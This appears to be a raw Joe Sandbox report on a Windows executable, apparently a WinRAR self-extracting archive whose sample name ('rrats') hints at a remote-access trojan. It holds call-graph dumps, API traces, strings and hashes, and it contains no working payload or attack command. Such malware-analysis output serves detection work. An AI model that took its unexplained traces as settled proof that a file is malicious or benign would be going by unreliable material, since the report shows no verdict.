cc3e3e 23709->23756 23711->23709 23713 cbc932 23711->23713 23712->23709 23714 ca4092 _swprintf 51 API calls 23713->23714 23716 cbc952 GetFileAttributesW 23714->23716 23715->23709 23716->23713 23717 cbc967 MoveFileW 23716->23717 23717->23709 23718 cbc97f MoveFileExW 23717->23718 23718->23709 23719->23709 23720 cbc8eb SHFileOperationW 23719->23720 23752 cab991 51 API calls 2 library calls 23719->23752 23720->23708 23721->23709 23724 cbd799 __cftof _wcslen 23722->23724 23723 cbd9e7 23723->23709 23724->23723 23725 cbd8a5 23724->23725 23726 cbd9c0 23724->23726 23778 cb1fbb CompareStringW 23724->23778 23769 caa231 23725->23769 23726->23723 23730 cbd9de ShowWindow 23726->23730 23730->23723 23731 cbd8d9 ShellExecuteExW 23731->23723 23733 cbd8ec 23731->23733 23735 cbd910 IsWindowVisible 23733->23735 23736 cbd925 WaitForInputIdle 23733->23736 23737 cbd97b CloseHandle 23733->23737 23734 cbd8d1 23734->23731 23735->23736 23738 cbd91b ShowWindow 23735->23738 23772 cbdc3b WaitForSingleObject 23736->23772 23740 cbd989 23737->23740 23741 cbd994 23737->23741 23738->23736 23780 cb1fbb CompareStringW 23740->23780 23741->23726 23742 cbd93d 23742->23737 23744 cbd950 GetExitCodeProcess 23742->23744 23744->23737 23745 cbd963 23744->23745 23745->23737 23749 cbb31e 23747->23749 23748 cbb40d 23748->23709 23749->23748 23750 cbb3f0 ExpandEnvironmentStringsW 23749->23750 23750->23748 23751->23709 23752->23719 23753->23709 23754->23709 23755->23709 23757 cc8e54 23756->23757 23758 cc8e6c 23757->23758 23759 cc8e61 23757->23759 23761 cc8e74 23758->23761 23767 cc8e7d __dosmaperr 23758->23767 23795 cc8e06 23759->23795 23762 cc8dcc _free 20 API calls 23761->23762 23765 cc8e69 23762->23765 23763 cc8ea7 HeapReAlloc 23763->23765 23763->23767 23764 cc8e82 23802 cc91a8 20 API calls __dosmaperr 23764->23802 23765->23709 23767->23763 23767->23764 23803 cc7a5e 7 API calls 2 library calls 23767->23803 23781 caa243 23769->23781 23773 cbdc9b 23772->23773 23774 cbdc56 23772->23774 23773->23742 23775 cbdc59 PeekMessageW 23774->23775 23776 cbdc6b GetMessageW TranslateMessage DispatchMessageW 23775->23776 23777 cbdc8c WaitForSingleObject 23775->23777 23776->23777 23777->23773 23777->23775 23778->23725 23779 cab6c4 GetFullPathNameW GetFullPathNameW GetCurrentDirectoryW 23779->23734 23780->23741 23789 cbec50 23781->23789 23784 caa23a 23784->23731 23784->23779 23785 caa261 23791 cabb03 23785->23791 23787 caa275 23787->23784 23788 caa279 GetFileAttributesW 23787->23788 23788->23784 23790 caa250 GetFileAttributesW 23789->23790 23790->23784 23790->23785 23792 cabb10 _wcslen 23791->23792 23793 cabbb8 GetCurrentDirectoryW 23792->23793 23794 cabb39 _wcslen 23792->23794 23793->23794 23794->23787 23796 cc8e44 23795->23796 23800 cc8e14 __dosmaperr 23795->23800 23805 cc91a8 20 API calls __dosmaperr 23796->23805 23798 cc8e2f RtlAllocateHeap 23799 cc8e42 23798->23799 23798->23800 23799->23765 23800->23796 23800->23798 23804 cc7a5e 7 API calls 2 library calls 23800->23804 23802->23765 23803->23767 23804->23800 23805->23799 23813 ccc051 31 API calls CatchGuardHandler 25533 cbe455 14 API calls ___delayLoadHelper2@8 25534 cbc793 108 API calls 4 library calls 25601 cc7f6e 52 API calls 3 library calls 25583 cc8268 55 API calls _free 24756 ca9f7a 24757 ca9f8f 24756->24757 24762 ca9f88 24756->24762 24758 ca9f9c GetStdHandle 24757->24758 24766 ca9fab 24757->24766 24758->24766 24759 caa003 WriteFile 24759->24766 24760 ca9fcf 24761 ca9fd4 WriteFile 24760->24761 24760->24766 24761->24760 24761->24766 24764 caa095 24768 ca6e98 77 API calls 24764->24768 24766->24759 24766->24760 24766->24761 24766->24762 24766->24764 24767 ca6baa 78 API calls 24766->24767 24767->24766 24768->24762 25602 ca1f72 129 API calls __EH_prolog 25536 cba070 10 API calls 25584 cbb270 99 API calls 24817 ca9a74 24821 ca9a7e 24817->24821 24818 ca9ab1 24819 ca9b9d SetFilePointer 24819->24818 24820 ca9bb6 GetLastError 24819->24820 24820->24818 24821->24818 24821->24819 24822 ca981a 79 API calls 24821->24822 24823 ca9b79 24821->24823 24822->24823 24823->24819 25538 ca1075 84 API calls 25539 cba400 GdipDisposeImage GdipFree 25585 cbd600 70 API calls 25540 cc6000 QueryPerformanceFrequency QueryPerformanceCounter 25569 cc2900 6 API calls 4 library calls 25586 ccf200 51 API calls 25604 cca700 21 API calls 25606 ca1710 86 API calls 25571 cbad10 73 API calls 25587 cbc220 93 API calls _swprintf 25545 ccf421 21 API calls __vsnwprintf_l 25546 ca1025 29 API calls 25573 cbf530 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter ___security_init_cookie 25609 cbff30 LocalFree 25390 ccbb30 25391 ccbb39 25390->25391 25392 ccbb42 25390->25392 25394 ccba27 25391->25394 25395 cc97e5 _unexpected 38 API calls 25394->25395 25396 ccba34 25395->25396 25414 ccbb4e 25396->25414 25398 ccba3c 25423 ccb7bb 25398->25423 25401 ccba53 25401->25392 25402 cc8e06 __vsnwprintf_l 21 API calls 25403 ccba64 25402->25403 25404 ccba96 25403->25404 25430 ccbbf0 25403->25430 25407 cc8dcc _free 20 API calls 25404->25407 25407->25401 25408 ccba91 25440 cc91a8 20 API calls __dosmaperr 25408->25440 25410 ccbada 25410->25404 25441 ccb691 26 API calls 25410->25441 25411 ccbaae 25411->25410 25412 cc8dcc _free 20 API calls 25411->25412 25412->25410 25415 ccbb5a ___scrt_is_nonwritable_in_current_image 25414->25415 25416 cc97e5 _unexpected 38 API calls 25415->25416 25421 ccbb64 25416->25421 25418 ccbbe8 _abort 25418->25398 25421->25418 25422 cc8dcc _free 20 API calls 25421->25422 25442 cc8d24 38 API calls _abort 25421->25442 25443 ccac31 EnterCriticalSection 25421->25443 25444 ccbbdf LeaveCriticalSection _abort 25421->25444 25422->25421 25424 cc4636 __cftof 38 API calls 25423->25424 25425 ccb7cd 25424->25425 25426 ccb7dc GetOEMCP 25425->25426 25427 ccb7ee 25425->25427 25429 ccb805 25426->25429 25428 ccb7f3 GetACP 25427->25428 25427->25429 25428->25429 25429->25401 25429->25402 25431 ccb7bb 40 API calls 25430->25431 25432 ccbc0f 25431->25432 25435 ccbc60 IsValidCodePage 25432->25435 25437 ccbc16 25432->25437 25439 ccbc85 __cftof 25432->25439 25433 cbfbbc CatchGuardHandler 5 API calls 25434 ccba89 25433->25434 25434->25408 25434->25411 25436 ccbc72 GetCPInfo 25435->25436 25435->25437 25436->25437 25436->25439 25437->25433 25445 ccb893 GetCPInfo 25439->25445 25440->25404 25441->25404 25443->25421 25444->25421 25446 ccb977 25445->25446 25448 ccb8cd 25445->25448 25450 cbfbbc CatchGuardHandler 5 API calls 25446->25450 25455 ccc988 25448->25455 25452 ccba23 25450->25452 25452->25437 25454 ccab78 __vsnwprintf_l 43 API calls 25454->25446 25456 cc4636 __cftof 38 API calls 25455->25456 25457 ccc9a8 MultiByteToWideChar 25456->25457 25459 ccc9e6 25457->25459 25466 ccca7e 25457->25466 25462 cc8e06 __vsnwprintf_l 21 API calls 25459->25462 25467 ccca07 __cftof __vsnwprintf_l 25459->25467 25460 cbfbbc CatchGuardHandler 5 API calls 25463 ccb92e 25460->25463 25461 ccca78 25474 ccabc3 20 API calls _free 25461->25474 25462->25467 25469 ccab78 25463->25469 25465 ccca4c MultiByteToWideChar 25465->25461 25468 ccca68 GetStringTypeW 25465->25468 25466->25460 25467->25461 25467->25465 25468->25461 25470 cc4636 __cftof 38 API calls 25469->25470 25471 ccab8b 25470->25471 25475 cca95b 25471->25475 25474->25466 25476 cca976 __vsnwprintf_l 25475->25476 25477 cca99c MultiByteToWideChar 25476->25477 25478 cca9c6 25477->25478 25479 ccab50 25477->25479 25482 cc8e06 __vsnwprintf_l 21 API calls 25478->25482 25485 cca9e7 __vsnwprintf_l 25478->25485 25480 cbfbbc CatchGuardHandler 5 API calls 25479->25480 25481 ccab63 25480->25481 25481->25454 25482->25485 25483 ccaa9c 25511 ccabc3 20 API calls _free 25483->25511 25484 ccaa30 MultiByteToWideChar 25484->25483 25486 ccaa49 25484->25486 25485->25483 25485->25484 25502 ccaf6c 25486->25502 25490 ccaaab 25492 cc8e06 __vsnwprintf_l 21 API calls 25490->25492 25495 ccaacc __vsnwprintf_l 25490->25495 25491 ccaa73 25491->25483 25493 ccaf6c __vsnwprintf_l 11 API calls 25491->25493 25492->25495 25493->25483 25494 ccab41 25510 ccabc3 20 API calls _free 25494->25510 25495->25494 25496 ccaf6c __vsnwprintf_l 11 API calls 25495->25496 25498 ccab20 25496->25498 25498->25494 25499 ccab2f WideCharToMultiByte 25498->25499 25499->25494 25500 ccab6f 25499->25500 25512 ccabc3 20 API calls _free 25500->25512 25503 ccac98 __dosmaperr 5 API calls 25502->25503 25504 ccaf93 25503->25504 25507 ccaf9c 25504->25507 25513 ccaff4 10 API calls 3 library calls 25504->25513 25506 ccafdc LCMapStringW 25506->25507 25508 cbfbbc CatchGuardHandler 5 API calls 25507->25508 25509 ccaa60 25508->25509 25509->25483 25509->25490 25509->25491 25510->25483 25511->25479 25512->25483 25513->25506 25548 ccc030 GetProcessHeap

                                                              Executed Functions

                                                              Function 00CBDF1E Relevance: 40.4, APIs: 17, Strings: 6, Instructions: 195filesleeptimeCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              APIs
                                                                • Part of subcall function 00CB0863: GetModuleHandleW.KERNEL32(kernel32), ref: 00CB087C
                                                                • Part of subcall function 00CB0863: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00CB088E
                                                                • Part of subcall function 00CB0863: GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00CB08BF
                                                                • Part of subcall function 00CBA64D: GetCurrentDirectoryW.KERNEL32(?,?), ref: 00CBA655
                                                                • Part of subcall function 00CBAC16: OleInitialize.OLE32(00000000), ref: 00CBAC2F
                                                                • Part of subcall function 00CBAC16: GdiplusStartup.GDIPLUS(?,?,00000000), ref: 00CBAC66
                                                                • Part of subcall function 00CBAC16: SHGetMalloc.SHELL32(00CE8438), ref: 00CBAC70
                                                              • GetCommandLineW.KERNEL32 ref: 00CBDF5C
                                                              • OpenFileMappingW.KERNEL32(000F001F,00000000,winrarsfxmappingfile.tmp), ref: 00CBDF83
                                                              • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00007104), ref: 00CBDF94
                                                              • UnmapViewOfFile.KERNEL32(00000000), ref: 00CBDFCE
                                                                • Part of subcall function 00CBDBDE: SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 00CBDBF4
                                                                • Part of subcall function 00CBDBDE: SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 00CBDC30
                                                              • CloseHandle.KERNEL32(00000000), ref: 00CBDFD7
                                                              • GetModuleFileNameW.KERNEL32(00000000,00CFEC90,00000800), ref: 00CBDFF2
                                                              • SetEnvironmentVariableW.KERNEL32(sfxname,00CFEC90), ref: 00CBDFFE
                                                              • GetLocalTime.KERNEL32(?), ref: 00CBE009
                                                              • _swprintf.LIBCMT ref: 00CBE048
                                                              • SetEnvironmentVariableW.KERNEL32(sfxstime,?), ref: 00CBE05A
                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 00CBE061
                                                              • LoadIconW.USER32(00000000,00000064), ref: 00CBE078
                                                              • DialogBoxParamW.USER32(00000000,STARTDLG,00000000,Function_0001B7E0,00000000), ref: 00CBE0C9
                                                              • Sleep.KERNELBASE(?), ref: 00CBE0F7
                                                              • DeleteObject.GDI32 ref: 00CBE130
                                                              • DeleteObject.GDI32(?), ref: 00CBE140
                                                              • CloseHandle.KERNEL32 ref: 00CBE183
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                              • Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID: EnvironmentFileHandleVariable$Module$AddressCloseDeleteObjectProcView$CommandCurrentDialogDirectoryGdiplusIconInitializeLineLoadLocalMallocMappingNameOpenParamSleepStartupTimeUnmap_swprintf
                                                              • String ID: %4d-%02d-%02d-%02d-%02d-%02d-%03d$C:\Users\user\Desktop$STARTDLG$sfxname$sfxstime$winrarsfxmappingfile.tmp
                                                              • API String ID: 3049964643-2656992072
                                                              • Opcode ID: 85f4a0330fb5174cb7a119a08879557515ce822e7952d8cc6e57ea827cd68bd6
                                                              • Instruction ID: 87db6cdba0d8ed761fca349c12857a474e2bf67903ce721f010d1d2e961c6fbc
                                                              • Opcode Fuzzy Hash: 85f4a0330fb5174cb7a119a08879557515ce822e7952d8cc6e57ea827cd68bd6
                                                              • Instruction Fuzzy Hash: 3C610671505385AFD320AFB5EC89FBF37ACEB45700F04042AF946962A2DB789E44D762
                                                              Function 00CBA6C2 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 100memorywindowCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 811 cba6c2-cba6df FindResourceW 812 cba7db 811->812 813 cba6e5-cba6f6 SizeofResource 811->813 814 cba7dd-cba7e1 812->814 813->812 815 cba6fc-cba70b LoadResource 813->815 815->812 816 cba711-cba71c LockResource 815->816 816->812 817 cba722-cba737 GlobalAlloc 816->817 818 cba73d-cba746 GlobalLock 817->818 819 cba7d3-cba7d9 817->819 820 cba7cc-cba7cd GlobalFree 818->820 821 cba74c-cba76a call cc0320 CreateStreamOnHGlobal 818->821 819->814 820->819 824 cba76c-cba78e call cba626 821->824 825 cba7c5-cba7c6 GlobalUnlock 821->825 824->825 830 cba790-cba798 824->830 825->820 831 cba79a-cba7ae GdipCreateHBITMAPFromBitmap 830->831 832 cba7b3-cba7c1 830->832 831->832 833 cba7b0 831->833 832->825 833->832
                                                              APIs
                                                              • FindResourceW.KERNEL32(?,PNG,00000000,?,?,?,00CBB73D,00000066), ref: 00CBA6D5
                                                              • SizeofResource.KERNEL32(00000000,?,?,?,00CBB73D,00000066), ref: 00CBA6EC
                                                              • LoadResource.KERNEL32(00000000,?,?,?,00CBB73D,00000066), ref: 00CBA703
                                                              • LockResource.KERNEL32(00000000,?,?,?,00CBB73D,00000066), ref: 00CBA712
                                                              • GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,?,00CBB73D,00000066), ref: 00CBA72D
                                                              • GlobalLock.KERNEL32(00000000), ref: 00CBA73E
                                                              • CreateStreamOnHGlobal.COMBASE(00000000,00000000,?), ref: 00CBA762
                                                              • GlobalUnlock.KERNEL32(00000000), ref: 00CBA7C6
                                                                • Part of subcall function 00CBA626: GdipAlloc.GDIPLUS(00000010), ref: 00CBA62C
                                                              • GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 00CBA7A7
                                                              • GlobalFree.KERNEL32(00000000), ref: 00CBA7CD
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                              • Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID: Global$Resource$AllocCreateGdipLock$BitmapFindFreeFromLoadSizeofStreamUnlock
                                                              • String ID: PNG
                                                              • API String ID: 211097158-364855578
                                                              • Opcode ID: a0373fe29b495eb56bbeffc1de5d170a65f168aa447ef7dcc78face7ca66a916
                                                              • Instruction ID: 5b0a298e01830bf7947d0bb3c3cf93b6742cfc1ab03abbf7f4e5508ad63cdd72
                                                              • Opcode Fuzzy Hash: a0373fe29b495eb56bbeffc1de5d170a65f168aa447ef7dcc78face7ca66a916
                                                              • Instruction Fuzzy Hash: FF31B1B5605352AFC7109F61EC88F5FBBB8EF84750F04052AF895A2221EF31DD44DAA2
                                                              Function 00CAA69B Relevance: 7.6, APIs: 5, Instructions: 105fileCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1222 caa69b-caa6bf call cbec50 1225 caa6c1-caa6ce FindFirstFileW 1222->1225 1226 caa727-caa730 FindNextFileW 1222->1226 1227 caa742-caa7ff call cb0602 call cac310 call cb15da * 3 1225->1227 1228 caa6d0-caa6e2 call cabb03 1225->1228 1226->1227 1229 caa732-caa740 GetLastError 1226->1229 1234 caa804-caa811 1227->1234 1237 caa6fe-caa707 GetLastError 1228->1237 1238 caa6e4-caa6fc FindFirstFileW 1228->1238 1231 caa719-caa722 1229->1231 1231->1234 1240 caa709-caa70c 1237->1240 1241 caa717 1237->1241 1238->1227 1238->1237 1240->1241 1243 caa70e-caa711 1240->1243 1241->1231 1243->1241 1245 caa713-caa715 1243->1245 1245->1231
                                                              APIs
                                                              • FindFirstFileW.KERNELBASE(?,?,?,?,?,?,00CAA592,000000FF,?,?), ref: 00CAA6C4
                                                                • Part of subcall function 00CABB03: _wcslen.LIBCMT ref: 00CABB27
                                                              • FindFirstFileW.KERNEL32(?,?,?,?,00000800,?,?,?,?,00CAA592,000000FF,?,?), ref: 00CAA6F2
                                                              • GetLastError.KERNEL32(?,?,00000800,?,?,?,?,00CAA592,000000FF,?,?), ref: 00CAA6FE
                                                              • FindNextFileW.KERNEL32(?,?,?,?,?,?,00CAA592,000000FF,?,?), ref: 00CAA728
                                                              • GetLastError.KERNEL32(?,?,?,?,00CAA592,000000FF,?,?), ref: 00CAA734
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                              • Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID: FileFind$ErrorFirstLast$Next_wcslen
                                                              • String ID:
                                                              • API String ID: 42610566-0
                                                              • Opcode ID: a40ca5b5e1c166be91db8245beeed0b6c0b28b41296915de75eeb4a039ba72a5
                                                              • Instruction ID: 061d1d20a3d1d9b19154c178986287fcddf59f7c23872170e6ee96712057e01e
                                                              • Opcode Fuzzy Hash: a40ca5b5e1c166be91db8245beeed0b6c0b28b41296915de75eeb4a039ba72a5
                                                              • Instruction Fuzzy Hash: 0A41CE72900516ABCB25DF68CC88BEEB7B8FB49350F004196F969E3210D7346E94CF91
                                                              Function 00CC7DEE Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              • GetCurrentProcess.KERNEL32(?,?,00CC7DC4,?,00CDC300,0000000C,00CC7F1B,?,00000002,00000000), ref: 00CC7E0F
                                                              • TerminateProcess.KERNEL32(00000000,?,00CC7DC4,?,00CDC300,0000000C,00CC7F1B,?,00000002,00000000), ref: 00CC7E16
                                                              • ExitProcess.KERNEL32 ref: 00CC7E28
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                              • Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID: Process$CurrentExitTerminate
                                                              • String ID:
                                                              • API String ID: 1703294689-0
                                                              • Opcode ID: 78f024125259ac2491d7fa47ed17173bd1253d1b7a5dca8a0a1cca79eff5b849
                                                              • Instruction ID: 5964a7dbf308e2252afbd4d442ae67ad4398d57d0bab2fad6ecaff0cd394d3b9
                                                              • Opcode Fuzzy Hash: 78f024125259ac2491d7fa47ed17173bd1253d1b7a5dca8a0a1cca79eff5b849
                                                              • Instruction Fuzzy Hash: 74E0B632005188AFCF116F64DD0AF4E7F6AEB50341F04455DF819AA172CB3AEE92DA91
                                                              Function 00CA848E Relevance: 2.5, APIs: 1, Instructions: 960COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                              • Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID: H_prolog
                                                              • String ID:
                                                              • API String ID: 3519838083-0
                                                              • Opcode ID: 407274834f907fc64fa113d5c879b9ac67be0379a819f2248b8d975872bfc601
                                                              • Instruction ID: 9531fe5b9fd9112753c3a96558579ea770b07dc488426c470a08c3315f07bdef
                                                              • Opcode Fuzzy Hash: 407274834f907fc64fa113d5c879b9ac67be0379a819f2248b8d975872bfc601
                                                              • Instruction Fuzzy Hash: D182FA70904147AFDF15DB64C895BFABBB9AF07308F0841B9E8599B182DB315B8CDB60
                                                              Function 00CB6CDC Relevance: .3, Instructions: 343COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                              • Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID: H_prolog
                                                              • String ID:
                                                              • API String ID: 3519838083-0
                                                              • Opcode ID: 054ed9539275ed83360fa25c9ed9e500a6e3e0781de40cab2b09193211a250c3
                                                              • Instruction ID: 42e090eeca56ea9b1bf065a764409b1d92f5c0989c47bc9ad27d22fbf2129962
                                                              • Opcode Fuzzy Hash: 054ed9539275ed83360fa25c9ed9e500a6e3e0781de40cab2b09193211a250c3
                                                              • Instruction Fuzzy Hash: 0DD1C6716083818FDB14DF28D94479BBBE1BF89308F08456DEC999B342D778EA05CB56
                                                              Function 00CBB7E0 Relevance: 104.0, APIs: 49, Strings: 10, Instructions: 731windowfilesleepCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • __EH_prolog.LIBCMT ref: 00CBB7E5
                                                                • Part of subcall function 00CA1316: GetDlgItem.USER32(00000000,00003021), ref: 00CA135A
                                                                • Part of subcall function 00CA1316: SetWindowTextW.USER32(00000000,00CD35F4), ref: 00CA1370
                                                              • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00CBB8D1
                                                              • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00CBB8EF
                                                              • IsDialogMessageW.USER32(?,?), ref: 00CBB902
                                                              • TranslateMessage.USER32(?), ref: 00CBB910
                                                              • DispatchMessageW.USER32(?), ref: 00CBB91A
                                                              • GetDlgItemTextW.USER32(?,00000066,?,00000800), ref: 00CBB93D
                                                              • EndDialog.USER32(?,00000001), ref: 00CBB960
                                                              • GetDlgItem.USER32(?,00000068), ref: 00CBB983
                                                              • SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 00CBB99E
                                                              • SendMessageW.USER32(00000000,000000C2,00000000,00CD35F4), ref: 00CBB9B1
                                                                • Part of subcall function 00CBD453: _wcslen.LIBCMT ref: 00CBD47D
                                                              • SetFocus.USER32(00000000), ref: 00CBB9B8
                                                              • _swprintf.LIBCMT ref: 00CBBA24
                                                                • Part of subcall function 00CA4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00CA40A5
                                                                • Part of subcall function 00CBD4D4: GetDlgItem.USER32(00000068,00CFFCB8), ref: 00CBD4E8
                                                                • Part of subcall function 00CBD4D4: ShowWindow.USER32(00000000,00000005,?,?,?,00CBAF07,00000001,?,?,00CBB7B9,00CD506C,00CFFCB8,00CFFCB8,00001000,00000000,00000000), ref: 00CBD510
                                                                • Part of subcall function 00CBD4D4: SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 00CBD51B
                                                                • Part of subcall function 00CBD4D4: SendMessageW.USER32(00000000,000000C2,00000000,00CD35F4), ref: 00CBD529
                                                                • Part of subcall function 00CBD4D4: SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 00CBD53F
                                                                • Part of subcall function 00CBD4D4: SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 00CBD559
                                                                • Part of subcall function 00CBD4D4: SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 00CBD59D
                                                                • Part of subcall function 00CBD4D4: SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 00CBD5AB
                                                                • Part of subcall function 00CBD4D4: SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 00CBD5BA
                                                                • Part of subcall function 00CBD4D4: SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 00CBD5E1
                                                                • Part of subcall function 00CBD4D4: SendMessageW.USER32(00000000,000000C2,00000000,00CD43F4), ref: 00CBD5F0
                                                              • GetLastError.KERNEL32(?,00000000,00000000,00000000,?), ref: 00CBBA68
                                                              • GetLastError.KERNEL32(?,?,00000000,00000000,00000000,?), ref: 00CBBA90
                                                              • GetTickCount.KERNEL32 ref: 00CBBAAE
                                                              • _swprintf.LIBCMT ref: 00CBBAC2
                                                              • GetLastError.KERNEL32(?,00000011), ref: 00CBBAF4
                                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000800,?,?,?,00000000,00000000,00000000,?), ref: 00CBBB43
                                                              • _swprintf.LIBCMT ref: 00CBBB7C
                                                              • CreateFileMappingW.KERNEL32(000000FF,00000000,08000004,00000000,00007104,winrarsfxmappingfile.tmp), ref: 00CBBBD0
                                                              • GetCommandLineW.KERNEL32 ref: 00CBBBEA
